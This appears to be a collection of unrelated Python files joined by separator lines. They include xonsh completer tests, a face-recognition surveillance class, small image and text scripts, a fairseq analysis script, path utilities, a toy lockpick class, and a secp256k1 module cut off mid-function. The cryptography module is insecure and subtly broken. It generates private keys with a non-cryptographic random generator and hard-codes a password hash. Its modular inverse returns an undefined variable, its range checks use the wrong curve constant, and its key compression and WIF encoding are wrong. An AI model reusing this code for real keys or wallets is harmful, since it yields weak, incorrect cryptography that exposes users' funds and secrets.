"""Tests for the base completer's logic (xonsh/completer.py)"""
import pytest
from xonsh.completers.tools import RichCompletion, contextual_command_completer, non_exclusive_completer
from xonsh.completer import Completer
from xonsh.parsers.completion_context import CommandContext
@pytest.fixture(scope="session")
def completer():
return Completer()
@pytest.fixture
def completers_mock(xonsh_builtins, monkeypatch):
completers = {}
monkeypatch.setattr(xonsh_builtins.__xonsh__, "completers", completers)
return completers
def test_sanity(completer, completers_mock):
# no completions:
completers_mock["a"] = lambda *a: None
assert completer.complete("", "", 0, 0) == ((), 0)
# simple completion:
completers_mock["a"] = lambda *a: {"comp"}
assert completer.complete("pre", "", 0, 0) == (("comp",), 3)
# multiple completions:
completers_mock["a"] = lambda *a: {"comp1", "comp2"}
assert completer.complete("pre", "", 0, 0) == (("comp1", "comp2"), 3)
# custom lprefix:
completers_mock["a"] = lambda *a: ({"comp"}, 2)
assert completer.complete("pre", "", 0, 0) == (("comp",), 2)
# RichCompletion:
completers_mock["a"] = lambda *a: {RichCompletion("comp", prefix_len=5)}
assert completer.complete("pre", "", 0, 0) == ((RichCompletion("comp", prefix_len=5),), 3)
def test_cursor_after_closing_quote(completer, completers_mock):
"""See ``Completer.complete`` in ``xonsh/completer.py``"""
@contextual_command_completer
def comp(context: CommandContext):
return {context.prefix + "1", context.prefix + "2"}
completers_mock["a"] = comp
assert completer.complete("", "", 0, 0, {}, multiline_text="'test'", cursor_index=6) == (
("test1'", "test2'"), 5
)
assert completer.complete("", "", 0, 0, {}, multiline_text="'''test'''", cursor_index=10) == (
("test1'''", "test2'''"), 7
)
def test_cursor_after_closing_quote_override(completer, completers_mock):
"""Test overriding the default values"""
@contextual_command_completer
def comp(context: CommandContext):
return {
# replace the closing quote with "a"
RichCompletion("a", prefix_len=len(context.closing_quote), append_closing_quote=False),
# add text after the closing quote
RichCompletion(context.prefix + "_no_quote", append_closing_quote=False),
# sanity
RichCompletion(context.prefix + "1"),
}
completers_mock["a"] = comp
assert completer.complete("", "", 0, 0, {}, multiline_text="'test'", cursor_index=6) == (
(
"a",
"test1'",
"test_no_quote",
), 5
)
assert completer.complete("", "", 0, 0, {}, multiline_text="'''test'''", cursor_index=10) == (
(
"a",
"test1'''",
"test_no_quote",
), 7
)
def test_append_space(completer, completers_mock):
@contextual_command_completer
def comp(context: CommandContext):
return {
RichCompletion(context.prefix + "a", append_space=True),
RichCompletion(context.prefix + " ", append_space=False), # bad usage
RichCompletion(context.prefix + "b", append_space=True, append_closing_quote=False),
}
completers_mock["a"] = comp
assert completer.complete("", "", 0, 0, {}, multiline_text="'test'", cursor_index=6) == (
(
"test '",
"testa' ",
"testb ",
), 5
)
@pytest.mark.parametrize("middle_result, exp", (
(
# stop at the first exclusive result
(
{"b1", "b2"},
("a1", "a2", "b1", "b2")
),
# pass empty exclusive results
(
{},
("a1", "a2", "c1", "c2")
),
# pass empty exclusive results
(
None,
("a1", "a2", "c1", "c2")
),
# stop at StopIteration
(
StopIteration,
("a1", "a2")
),
)
))
def test_non_exclusive(completer, completers_mock, middle_result, exp):
completers_mock["a"] = non_exclusive_completer(lambda *a: {"a1", "a2"})
def middle(*a):
if middle_result is StopIteration:
raise StopIteration()
return middle_result
completers_mock["b"] = middle
completers_mock["c"] = non_exclusive_completer(lambda *a: {"c1", "c2"})
assert completer.complete("", "", 0, 0, {})[0] == exp
|
import face_recognition
import cv2
import numpy as np
import torch
import torchtext
import os
import sys
import string
import random
import imutils
import datetime
from google.cloud import vision
class Sercurity:
def __init__(self, datasets_path, accumWeight=0.5):
self.glove = torchtext.vocab.GloVe(name="6B", dim=50)
self.datasets_path = datasets_path
self.known_face_encodings = []
self.known_face_names = []
# store the accumulated weight factor
self.accumWeight = accumWeight
# initialize the background model
self.bg = None
self.dangers = ['gun', 'knife', 'coke']
def print_closest_words(self, vec, n):
dists = torch.norm(self.glove.vectors - vec, dim=1)
lst = sorted(enumerate(dists.numpy()), key=lambda x: x[1])
result = []
for idx, difference in lst[1:n+1]:
result.append(self.glove.itos[idx])
return result
def load_config(self, dist):
for key, item in dist.items():
print(key, item)
if item == 'on':
if 'SMS' in key:
# set up SMS
pass
else:
self.dangers.append(key)
else:
if 'SMS' in key:
# disable SMS
pass
else:
self.dangers.remove(key)
def update(self, image):
# if the background model is None, initialize it
if self.bg is None:
self.bg = image.copy().astype("float")
return
# update the background model by accumulating the weighted
# average
cv2.accumulateWeighted(image, self.bg, self.accumWeight)
def load_known_face(self):
for filename in os.listdir(self.datasets_path):
if 'jpg' in filename or 'png' in filename:
face_path = os.path.join(self.datasets_path, filename)
                # Load face image from the datasets folder
face = face_recognition.load_image_file(face_path)
face_encoding = face_recognition.face_encodings(face)[0]
self.known_face_encodings.append(face_encoding)
face_name = filename.replace('_', '.').split('.')[0]
self.known_face_names.append(face_name)
print(face_name)
    # inputs:
    #   locations: a list of tuples containing the location of each face, e.g. [(), ()]
    #   img: a 3-dimensional image matrix
    # return:
    #   list of face encodings
def extract_face(self,locations, img):
        return face_recognition.face_encodings(img, locations)
def randomString(self, stringLength=10):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
    def face_detection(self, image):
        client = vision.ImageAnnotatorClient()
        imageByte = vision.types.Image(content=cv2.imencode('.jpg', image)[1].tostring())
        # run Google Cloud Vision face detection and return the bounding polygons
        response = client.face_detection(image=imageByte)
        faces = response.face_annotations
        print('Faces found: {}'.format(len(faces)))
        faceBounds = [face.bounding_poly for face in faces]
        return faceBounds
def set_danger_label(self, list_label):
        self.danger_labels = list_label
def detect_labels(self, image):
"""Detects labels in the file."""
client = vision.ImageAnnotatorClient()
imageByte = vision.types.Image(content=cv2.imencode('.jpg', image)[1].tostring())
tlabels = []
v_scores = []
objects = client.object_localization(image=imageByte).localized_object_annotations
print('Number of objects found: {}'.format(len(objects)))
for object_ in objects:
tlabels.append(object_.name)
v_scores.append(object_.score)
print('\n{} (confidence: {})'.format(object_.name, object_.score))
return tlabels, v_scores
def analyzer(self, labels, v_scores):
if np.shape(v_scores)[0] != 0:
n_scores = np.zeros(np.shape(v_scores))
n_label = np.empty(np.shape(v_scores), dtype="S15")
for i, label in enumerate(labels):
##### word calculus #####
label = label.split(' ')
label_t = self.glove[label[0].lower()]
for token in label[1:]:
label_t = label_t + self.glove[token]
##### word calculus #####
# print(label)
for danger in self.dangers:
danger_t = self.glove[danger.lower()].unsqueeze(0)
max_sim = 0
# danger_sets = self.print_closest_words(danger_t, 2)
# max_sim = torch.cosine_similarity(label_t.unsqueeze(0), danger_t)
# n_label[i] = danger
# n_scores[i] = max_sim
# for danger_sub in danger_sets:
# danger_sub_t = self.glove[danger_sub.lower()].unsqueeze(0)
similarity = torch.cosine_similarity(label_t.unsqueeze(0), danger_t)
# print(similarity)
if similarity > max_sim:
max_sim = similarity
n_label[i] = danger
n_scores[i] = similarity.item()
labels = np.array(labels)
n_scores = np.array(n_scores)
v_scores = np.array(v_scores)
norm = np.add(n_scores, v_scores) / 2
# print(norm[norm>0.55])
n_label = np.array(n_label)
dangers_need_report = n_label[norm>0.78]
norm = norm[norm>0.78]
return dangers_need_report, norm
return None, None
def add_new_face_to_datasets(self, face_img, face_encoding):
        confirm = input('Unknown face detected. Do you want to add it to the dataset? (Y/N) ')
if confirm == 'Y' or confirm == 'y':
new_face_name = input('Name:')
            new_face_path = os.path.join(self.datasets_path, new_face_name+'_'+self.randomString(10)+'.jpg')
cv2.imwrite(new_face_path, face_img)
self.known_face_encodings.append(face_encoding)
self.known_face_names.append(new_face_name)
print('New image saved!')
def crop_face(self, frame, face_location):
top = face_location[0]*4
right = face_location[1]*4
bottom = face_location[2]*4
left = face_location[3]*4
face = frame[top:bottom, left:right]
return face
def shrink_frame(self, frame):
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
return small_frame[:, :, ::-1]
def recongnize(self, frame):
rgb_small_frame = self.shrink_frame(frame)
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
name_result = []
for i, face_encoding in enumerate(face_encodings):
matches = face_recognition.compare_faces(self.known_face_encodings, face_encoding)
name = 'Unknown'
face_distances = face_recognition.face_distance(self.known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = self.known_face_names[best_match_index]
name_result.append(name)
return face_locations, name_result
def display_result(self, frame, locations, names):
# Display the results
for (top, right, bottom, left), name in zip(locations, names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
return frame
def motion_detect(self, image, tVal=45):
# compute the absolute difference between the background model
# and the image passed in, then threshold the delta image
delta = cv2.absdiff(self.bg.astype("uint8"), image)
thresh = cv2.threshold(delta, tVal, 255, cv2.THRESH_BINARY)[1]
# perform a series of erosions and dilations to remove small
# blobs
thresh = cv2.erode(thresh, None, iterations=2)
thresh = cv2.dilate(thresh, None, iterations=2)
# find contours in the thresholded image and initialize the
# minimum and maximum bounding box regions for motion
cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
(minX, minY) = (np.inf, np.inf)
(maxX, maxY) = (-np.inf, -np.inf)
# if no contours were found, return None
if len(cnts) == 0:
return None
# otherwise, loop over the contours
for c in cnts:
# compute the bounding box of the contour and use it to
# update the minimum and maximum bounding box regions
(x, y, w, h) = cv2.boundingRect(c)
(minX, minY) = (min(minX, x), min(minY, y))
(maxX, maxY) = (max(maxX, x + w), max(maxY, y + h))
# otherwise, return a tuple of the thresholded image along
# with bounding box
return (thresh, (minX, minY, maxX, maxY))
def detect_and_show(self, frame, total, frameCount):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if np.shape(gray) == np.shape(self.bg):
gray = cv2.GaussianBlur(gray, (7, 7), 0)
mo = False
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime(
"%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# if the total number of frames has reached a sufficient
# number to construct a reasonable background model, then
# continue to process the frame
if total > frameCount:
# detect motion in the image
motion = self.motion_detect(gray)
            # check to see if motion was found in the frame
if motion is not None:
# unpack the tuple and draw the box surrounding the
# "motion area" on the output frame
(thresh, (minX, minY, maxX, maxY)) = motion
cv2.rectangle(frame, (minX, minY), (maxX, maxY),
(0, 0, 255), 2)
mo = True
# update the background model and increment the total number
# of frames read thus far
self.update(gray)
return mo, frame
else:
self.bg = None
self.update(gray)
return False, frame
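# A minimal usage sketch (illustrative only; assumes a webcam at index 0, a ./datasets folder with
# known faces, and that the GloVe vectors and Google Vision credentials are available):
#     security = Sercurity('./datasets')
#     security.load_known_face()
#     ret, frame = cv2.VideoCapture(0).read()
#     locations, names = security.recongnize(frame)
#     frame = security.display_result(frame, locations, names)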
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'Thibaut Kovaltchouk'
filename = "lenna.jpg"
import numpy as np
import cv2
def replace_impose(imageBGR, value, impose="H"):
imgIn = cv2.cvtColor(imageBGR, cv2.COLOR_BGR2HSV)
    # fix the chosen channel (H, S or V) to the given value, depending on the impose parameter
if impose.lower() == "h":
imgIn[:,:,0] = value*np.ones(imgIn.shape[:2], dtype=np.uint8)
elif impose.lower() == "s":
imgIn[:,:,1] = value*np.ones(imgIn.shape[:2], dtype=np.uint8)
elif impose.lower() == "v":
imgIn[:,:,2] = value*np.ones(imgIn.shape[:2], dtype=np.uint8)
else:
print("impose = ", impose)
print("Should be H, S or V")
imgOut = cv2.cvtColor(imgIn, cv2.COLOR_HSV2BGR)
return imgOut
imgIn = cv2.imread(filename)
listH = np.linspace(0, 360, 16)
for h in listH:
img = np.copy(imgIn)
New_img = replace_impose(img, int(h/2), impose="H")
base = filename.split(".")[-2]
outputImage = base + "_H" + str(int(h)) + ".png"
cv2.imwrite(outputImage, New_img)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import string
input_text = open('idz2.txt', 'r').read().lower().split(' ')
alphabet = list(string.ascii_lowercase)
unique_words = []
for word in input_text:
if word not in unique_words:
unique_words.append(word)
unique_words = re.sub(r'[^\w\s]', '', str(unique_words)).split()
min_value = len(unique_words)
min_char = 0
for char in alphabet:
counter = 0
for word in unique_words:
if char in word:
counter += 1
if counter < min_value:
min_value = counter
min_char = char
    print(f'The letter {char.upper()} occurs in {round(counter / len(unique_words) * 100, 2)}% of the words.')
print(f'\tThe letter {min_char.upper()} occurred in {round(min_value / len(unique_words) * 100, 2)}% of the words. '
      f'THIS IS THE RAREST LETTER IN THE TEXT')
|
import argparse
import html
import json
import os
from collections import Counter
from tqdm import tqdm
import numpy as np
import pandas as pd
import torch
from fairseq.modules.adaptive_input import AdaptiveInput
from fairseq.modules.adaptive_softmax import AdaptiveSoftmax
num_layers = 16
def get_model(model_dir):
model_path = os.path.join(model_dir, "model.pt")
model = torch.load(model_path)['model']
embedding_parameters = {k[len('decoder.embed_tokens.'):]: v for k, v in model.items() if 'embed_tokens' in k}
embedding = AdaptiveInput(267744, 0, 1024, 4, 1024, [20000, 60000])
embedding.load_state_dict(embedding_parameters)
softmax = AdaptiveSoftmax(267744, 1024, [20000, 60000], 0.2, adaptive_inputs=embedding)
return model, softmax
def load_vocab(model_dir):
vocab = [['<s>', -1], ['<pad>', -1], ['</s>', -1], ['<unk>', -1]]
vocab_path = os.path.join(model_dir, "dict.txt")
with open(vocab_path, "r") as fd:
vocab.extend([line.strip('\n').split(' ') for line in fd.readlines()])
token_to_id = {token_cnt[0]: i for i, token_cnt in enumerate(vocab)}
return vocab, token_to_id
def get_target_counts(catalog_dir):
target_counts = {}
for filename in tqdm(os.listdir(catalog_dir)):
        dim, layer = os.path.splitext(filename)[0].split('_')
with open(os.path.join(catalog_dir, filename), "r") as fd:
top_records = [line.split('\t')[1] for line in fd.readlines()]
# fix bug: taking the one-before-last token, because we are ignoring the BOS token.
dim_targets = []
for record in top_records:
record_tokens = record.split(' ')
if len(record_tokens) > 1:
target_token = html.unescape(record_tokens[-2])
if target_token in ['unk', 'pad']:
target_token = '<' + target_token + '>'
dim_targets.append(target_token)
else:
dim_targets.append("<s>")
dim_target_counts = Counter(dim_targets)
target_counts[f"{layer}_{dim}"] = {target: cnt for target, cnt in dim_target_counts.most_common()}
return target_counts
def get_softmax_log_probabilities(model, softmax, weight_coefficient):
log_probs = []
for layer_i in tqdm(range(num_layers)):
layer_fc2_vals = model[f"decoder.layers.{layer_i}.fc2.weight"] * weight_coefficient
layer_log_probs = softmax.get_log_prob(layer_fc2_vals.T.unsqueeze(0), None).squeeze()
log_probs.append(layer_log_probs)
return log_probs
def compare_argmax_w1_w2_all_layers(log_probs, vocab, token_to_id, catalog):
num_dims = len(log_probs[0])
num_vocab_ids = len(log_probs[0][0])
max_probs = []
argmax_probs = []
emb_tokens = []
target_counts = []
target_rankings = []
for layer_i, layer_log_probs in tqdm(enumerate(log_probs)):
layer_log_probs_max = layer_log_probs.max(axis=1)
layer_probs_max_embs = layer_log_probs_max[1].numpy().tolist()
max_probs.append(layer_log_probs_max[0].exp().detach().numpy().tolist())
argmax_probs.append(layer_probs_max_embs)
layer_emb_tokens = [
vocab[layer_probs_max_emb][0]
for layer_probs_max_emb in layer_probs_max_embs
]
emb_tokens.append(layer_emb_tokens)
layer_target_counts = []
for dim_i, layer_emb_token in enumerate(layer_emb_tokens):
layer_dim = f"{layer_i}_{dim_i}"
if layer_dim not in catalog:
layer_target_counts.append(-1)
elif layer_emb_token in catalog[layer_dim]:
layer_target_counts.append(catalog[layer_dim][layer_emb_token])
else:
layer_target_counts.append(0)
target_counts.append(layer_target_counts)
layer_log_probs_argsort = torch.argsort(layer_log_probs, axis=1, descending=True).numpy()
layer_target_rankings = []
for dim_i in range(num_dims):
layer_dim = f"{layer_i}_{dim_i}"
dim_layer_target_rankings = []
for target_token in catalog[layer_dim]:
if target_token in token_to_id:
target_id = token_to_id[target_token]
else:
target_id = token_to_id["<unk>"]
if target_id >= num_vocab_ids:
print(f"{layer_dim}: token {target_token} out-of-vocab with id {target_id}")
continue
target_id_rank = np.where(layer_log_probs_argsort[dim_i] == target_id)[0][0]
dim_layer_target_rankings.extend([target_id_rank] * catalog[layer_dim][target_token])
layer_target_rankings.append(dim_layer_target_rankings)
target_rankings.append(layer_target_rankings)
all_dims_data = [
{
"layer": layer_i,
"W2_dim": dim_i,
"max_prob": max_probs[layer_i][dim_i],
"embedding_index": argmax_probs[layer_i][dim_i],
"embedding_token": emb_tokens[layer_i][dim_i],
"embedding_token_target_count": target_counts[layer_i][dim_i],
"target_rankings": target_rankings[layer_i][dim_i]
}
for layer_i in range(len(max_probs))
for dim_i in range(len(max_probs[layer_i]))
]
df = pd.DataFrame.from_records(all_dims_data)
return df, max_probs
def main(args):
model, softmax = get_model(args.model_dir)
vocab, token_to_id = load_vocab(args.model_dir)
catalog = get_target_counts(args.data_dir)
print("get max probability per W2 column...")
log_probs = get_softmax_log_probabilities(model, softmax, weight_coefficient=1)
print("map to tokens and get target rankings in W2 induced probs...")
df_w1_w2_argmax, max_probs = compare_argmax_w1_w2_all_layers(log_probs, vocab, token_to_id, catalog)
print("saving results...")
df_w1_w2_argmax.to_csv(f"{args.output_base}.tsv", sep="\t", index=False)
json.dump(max_probs,
open(f"{args.output_base}_max_probs.json", "w"),
indent=4)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
help='path to a per-key trigger examples directory')
parser.add_argument('--model_dir', type=str, default='checkpoints/adaptive_lm_wiki103.v2',
help='path to model checkpoints directory')
parser.add_argument('--output_base', type=str, default='',
help='path to output path (without a file extension)')
args = parser.parse_args()
assert os.path.exists(args.data_dir)
assert os.path.exists(args.model_dir)
main(args)
|
import os
import os.path
from typing import List
from pathlib import Path
def get_cirrus_lib_requirements() -> List[str]:
'''
Get the cirrus-lib dependencies.
'''
try:
from importlib import metadata
except ImportError:
import importlib_metadata as metadata
return [
req.split(';')[0].translate(str.maketrans('','',' ()'))
for req in metadata.requires('cirrus-lib')
]
def relative_to(path1: Path, path2: Path) -> Path:
common_path = path1
relative = ''
path = path2.resolve()
result = path
while True:
try:
result = path.relative_to(common_path)
except ValueError:
_common_path = common_path.parent
relative += '../'
else:
if not relative:
relative = './'
return Path(relative + str(result))
if _common_path == common_path:
break
common_path = _common_path
return result
def relative_to_cwd(path: Path) -> Path:
    return Path('.{}{}'.format(
        os.path.sep,
        relative_to(Path(os.getcwd()), path),
    ))
def clean_dir(directory: Path) -> None:
import shutil
if not directory.is_dir():
return
for f in directory.iterdir():
if not f.is_symlink() and f.is_dir():
shutil.rmtree(f)
else:
f.unlink()
|
x = int(input("Escolha\n1.Cagar\n2.Mijar\n3.Peidar\n"))
if x == 1:
print("cagão")
else:
print("mijão")
x = 10
y = 15
z = 25
print(x == z - y and z != y - x or not y != z - x)
|
from types import SimpleNamespace
from . import errors
import logging
log = logging.getLogger(__name__)
class Locker:
'''Simple locker that can be unlocked with multiple picks'''
def __init__(self):
self.unlocked = False
class LockpickStorage(SimpleNamespace):
pass
self.lockpicks = LockpickStorage()
log.debug("Initialized Locker instance")
def get_status(self):
'''Return locker's status'''
log.debug(f"Returning current locker's status: {self.unlocked}")
return self.unlocked
def get_lockpicks(self):
'''Return lockpicks'''
log.debug(f"Returning current lockpicks: {self.lockpicks}")
return vars(self.lockpicks)
def check_lockpick(self, name:str):
'''Checks if lockpick exists in storage. Returns bool depending on status'''
        if getattr(self.lockpicks, name, None) is None:
            log.debug(f"{name} doesn't exist in storage")
return False
log.debug(f"{name} exists in storage")
return True
def get_lockpick(self, name:str):
'''Get specified lockpick. If not in storage - will throw exception'''
if not self.check_lockpick(name):
raise errors.LockpickDoesntExist(name)
log.debug(f"Returning lockpick {name}")
return getattr(self.lockpicks, name)
def add_lockpick(self, name:str, status:bool = False):
'''Add lockpick to the lockpicks storage'''
if self.check_lockpick(name):
raise errors.LockpickExists(name)
setattr(self.lockpicks, name, status)
log.debug(f"Succesfully added {name} to the lockpicks storage")
def toggle_lockpick(self, name:str, status:bool = None):
        '''Toggle an existing lockpick. Expects the lockpick to already exist in storage.
        Without a specified status, flips the lockpick's current value'''
if not self.check_lockpick(name):
raise errors.LockpickDoesntExist(name)
        if status is None:
            status = not getattr(self.lockpicks, name)
setattr(self.lockpicks, name, status)
log.debug(f"Successfully toggled status of {name} lockpick to {status}")
def picklock(self):
'''Check current storage against keys. If all True - set self.unlocked to
True, else - to False'''
storage_items = vars(self.lockpicks)
for item in storage_items:
if not storage_items[item]:
self.unlocked = False
log.debug(f"Storage is locked: {item} is incorrect lockpick")
return self.unlocked
self.unlocked = True
log.debug("Storage has been unlocked: all lockpicks has matched")
return self.unlocked
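# A minimal usage sketch (illustrative only): every stored lockpick must be True for picklock()
# to report the locker as unlocked.
#     locker = Locker()
#     locker.add_lockpick("pin_1", True)
#     locker.add_lockpick("pin_2")        # defaults to False
#     locker.picklock()                   # -> False
#     locker.toggle_lockpick("pin_2")     # flips False -> True
#     locker.picklock()                   # -> True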
|
# This module contains functions and classes for secp256k1 elliptic curve cryptography
import numpy as np
import hashlib
import random
from getpass import getpass
# Hard-coded variables
# secp256k1 parameters
secp_G = [int("79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798", 16),\
int("483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8", 16)]
secp_n = int("FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141", 16)
secp_p = int("FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F", 16)
secp_a = int(0)
secp_b = int(7)
secp_inf_point = [0, 0]
#Symmetric Key
sym_key_n = int(2**512)
#Base58 and Base64 encoding
alphabet_58 = '123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
base58_count = len(alphabet_58)
alphabet_64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
base64_count = len(alphabet_64)
def passwd():
i = 0
while i < 4:
pass_attempt = getpass()
if password_check(pass_attempt) != True:
if i > 2:
print("\nPassword authentication failed. Aborting....")
quit()
print("\nPassword attempt failed. You have "+str(3-i)+" remaining attempts.")
i += 1
else:
break
def password_check(password_attempt):
if type(password_attempt) != str:
raise Exception("password input must be a string!")
# Uses a hard-coded password hash (insecure)
password_hash = '8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92'
if hashlib.sha256(password_attempt.encode()).hexdigest() == password_hash:
return True
else:
return False
def bin_array(integer):
    # Returns a binary array representation of a positive integer
if type(integer)!= int or integer < 0:
raise Exception("input must be a positive integer!")
return [int(x) for x in bin(integer)[2:]]
class base_58(object):
def encode(self, num):
""" Returns num in a base64-encoded string"""
encode = ''
if (num < 0):
return ''
while (num >= base58_count):
mod = num % base58_count
encode = alphabet_58[mod] + encode
num = num // base58_count
if (num):
encode = alphabet_58[num] + encode
return encode
def decode(self, s):
"""Decodes the base58-encoded string s into an integer"""
decoded = 0
multi = 1
s = s[::-1]
for char in s:
decoded += multi * alphabet_58.index(char)
multi = multi * base58_count
return decoded
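# A minimal round-trip sketch (illustrative only): decoding an encoded value returns the original,
# e.g. base_58().decode(base_58().encode(12345)) == 12345.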
class base_64(object):
def encode(self, num):
""" Returns num in a base58-encoded string"""
encode = ''
if (num < 0):
return ''
while (num >= base64_count):
mod = num % base64_count
encode = alphabet_64[mod] + encode
num = num // base64_count
if (num):
encode = alphabet_64[num] + encode
padding = "="
return encode + padding
def decode(self, s):
if s[len(s)-1]!= '=':
raise Exception("Base64 encoded object not formatted correctly. String should end with '='.")
s = s[:len(s)-1]
decoded = 0
multi = 1
s = s[::-1]
for char in s:
decoded += multi * alphabet_64.index(char)
multi = multi * base64_count
return decoded
#Integer math
class intmath(object):
def mod_inv(self, num, modulus):
        # finds the inverse of num modulo modulus, assumes they are coprime
if type(num) != int:
raise Exception("Inputs must be integer values")
if num <= 0 or num > secp_p:
num = num % modulus
if num == 1:
return a
# Find gcd using Extended Euclid's Algorithm
gcd, x, y = intmath().extended_euclid_gcd(num, modulus)
# In case x is negative, we handle it by adding extra M
# Because we know that multiplicative inverse of A in range M lies
# in the range [0, M-1]
if x < 0:
x += modulus
return x
def extended_euclid_gcd(self, a, b):
"""
Returns a list `result` of size 3 where:
Referring to the equation ax + by = gcd(a, b)
result[0] is gcd(a, b)
result[1] is x
result[2] is y
"""
s = 0; old_s = 1
t = 1; old_t = 0
r = b; old_r = a
while r != 0:
quotient = old_r//r
# In Python, // operator performs integer or floored division
# This is a pythonic way to swap numbers
# See the same part in C++ implementation below to know more
old_r, r = r, old_r - quotient*r
old_s, s = s, old_s - quotient*s
old_t, t = t, old_t - quotient*t
return [old_r, old_s, old_t]
def sqrtmod(self, a, p):
""" Find a quadratic residue (mod p) of 'a'. p
must be an odd prime and p must be equivalent to 3 mod 4.
Solve the congruence of the form:
x^2 = a (mod p)
And returns x. Note that p - x is also a root.
0 is returned if no square root exists for
these a and p.
        Only the simple case p = 3 (mod 4) is implemented here,
        where x = a^((p+1)/4) (mod p); the general Tonelli-Shanks
        algorithm is not implemented.
        """
# Simple cases
#
if p % 4 == 3:
power = (p+1) // 4
return pow(a, power , p)
elif a == 0:
return 0
elif p == 2:
return 0
elif intmath().legendre_symbol(a, p) != 1:
return 0
        else:
            raise Exception("p must be an odd prime congruent to 3 mod 4; general Tonelli-Shanks is not implemented")
def legendre_symbol(self, a, p):
""" Compute the Legendre symbol a|p using
Euler's criterion. p is a prime, a is
relatively prime to p (if p divides
a, then a|p = 0)
Returns 1 if a has a square root modulo
p, -1 otherwise.
"""
        ls = pow(a, (p - 1) // 2, p)
return -1 if ls == p - 1 else ls
# secp256k1
class libsecp(object):
def private_key(self):
        return random.randint(1, secp_n - 1)
def public_key(self, priv_key):
if priv_key > secp_n or priv_key < 0 or type(priv_key) != int:
raise Exception("Private key must be an integer between 1 and n.")
        return self.point_mul(priv_key, secp_G)
def public_key_hex(self, pubkey):
if type(pubkey[0]) != int or type(pubkey[1]) != int:
raise Exception("input must be valid (x,y) coordinate.")
if pubkey[0] > secp_p or pubkey[0] < 0 or pubkey[1] > secp_p or pubkey[1] < 0:
raise Exception("input must be valid secp256k1 element.")
pubkey_x = hex(pubkey[0])
pubkey_y = hex(pubkey[1])
result = '0x04' + str(pubkey_x[2:]).zfill(64) + str(pubkey_y[2:]).zfill(64)
return result
def compress_key(self, pub_key):
"""Takes a hexadecimal encoded or integer array public key
Returns a compressed public key '0x02....' or '0x03...' """
if type(pub_key) == str:
if len(pub_key) != 132:
raise Exception("Incorrect public key formatting.")
pub_key_x = int(pub_key[4:68], 16)
pub_key_y = int(pub_key[68:132], 16)
elif len(pub_key) == 2:
pub_key_x = pub_key[0]
pub_key_y = pub_key[1]
else:
raise Exception("incorrect public key formatting.")
if pub_key_x > secp_p or pub_key_x < 0 or pub_key_y > secp_p or pub_key_y < 0:
raise Exception("public key values outside the accepted range!")
if pub_key_y < secp_p // 2:
"""If the y-coordinate is less than (secp256k1) p then y is a "negative" EC point"""
pref = '02'
else:
pref = '03'
result = '0x' + pref + str(hex(pub_key_x)[2:])
return result
def decompress_key(self, comp_pub_key):
raise Exception("Not currently supported.")
"""Calculate the modular square root of x^3 + 7"""
if len(comp_pub_key) != 68:
raise Exception("public key must be a 32 byte string")
if comp_pub_key[0:4]!='0x02' and comp_pub_key[0:4]!='0x03':
raise Exception("Compressed key not formatted correctly!")
# Convert back to integer
pub_key_x = int(comp_pub_key[4:], 16)
rhs = (pow(pub_key_x,3) + secp_a*pub_key_x + secp_b) % secp_p
y_sol1 = intmath().sqrtmod(rhs, secp_p)
y_sol2 = (secp_p - y_sol1)
if pow(y_sol1, 2, secp_p) == rhs and pow(y_sol2, 2, secp_p) == rhs:
if comp_pub_key[0:4] == '0x02':
hex_y_neg = hex(min(y_sol1, y_sol2))
return '0x04' + str(comp_pub_key[4:]) + hex_y_neg[2:]
if comp_pub_key[0:4] == '0x03':
hex_y_pos = hex(max(y_sol1, y_sol2))
return '0x04' + str(comp_pub_key[4:]) + hex_y_pos[2:]
else:
raise Exception("Decompression Failed.")
def wif(self, priv_key):
prefix = "L"
base58_enc = base_58().encode(priv_key)
result = prefix + base58_enc
return result
def decode_wif(self, priv_key_string):
if type(priv_key_string) != str or priv_key_string[0] != 'L' or len(priv_key_string) > 50:
raise Exception("WIF private key not formatted correctly.")
priv_key = base_58().decode(priv_key_string[1:])
return priv_key
def point_double(self, A):
        return self.point_add(A, A)
def point_add(self, A, B):
# input 2 elliptic curve points
if A==secp_inf_point:
return B
if B == secp_inf_point:
return A
if len(A)!=2 or len(B)!=2:
raise Exception("public key must be an array of length 2!")
if type(A[0]) != int or type(B[0]) != int:
raise Exception("EC curve point must be an array of integers!")
if A[0] >= secp_n or A[0] < 0 or A[1] < 0 or A[1] >= secp_n:
raise Exception("input parameter 1 outside the accepted range!")
if B[0] >= secp_n or B[0] < 0 or B[1] < 0 or B[1] >= secp_n:
raise Exception("input parameter 2 outside the accepted range!")
# if A is not equal to B then use this formula
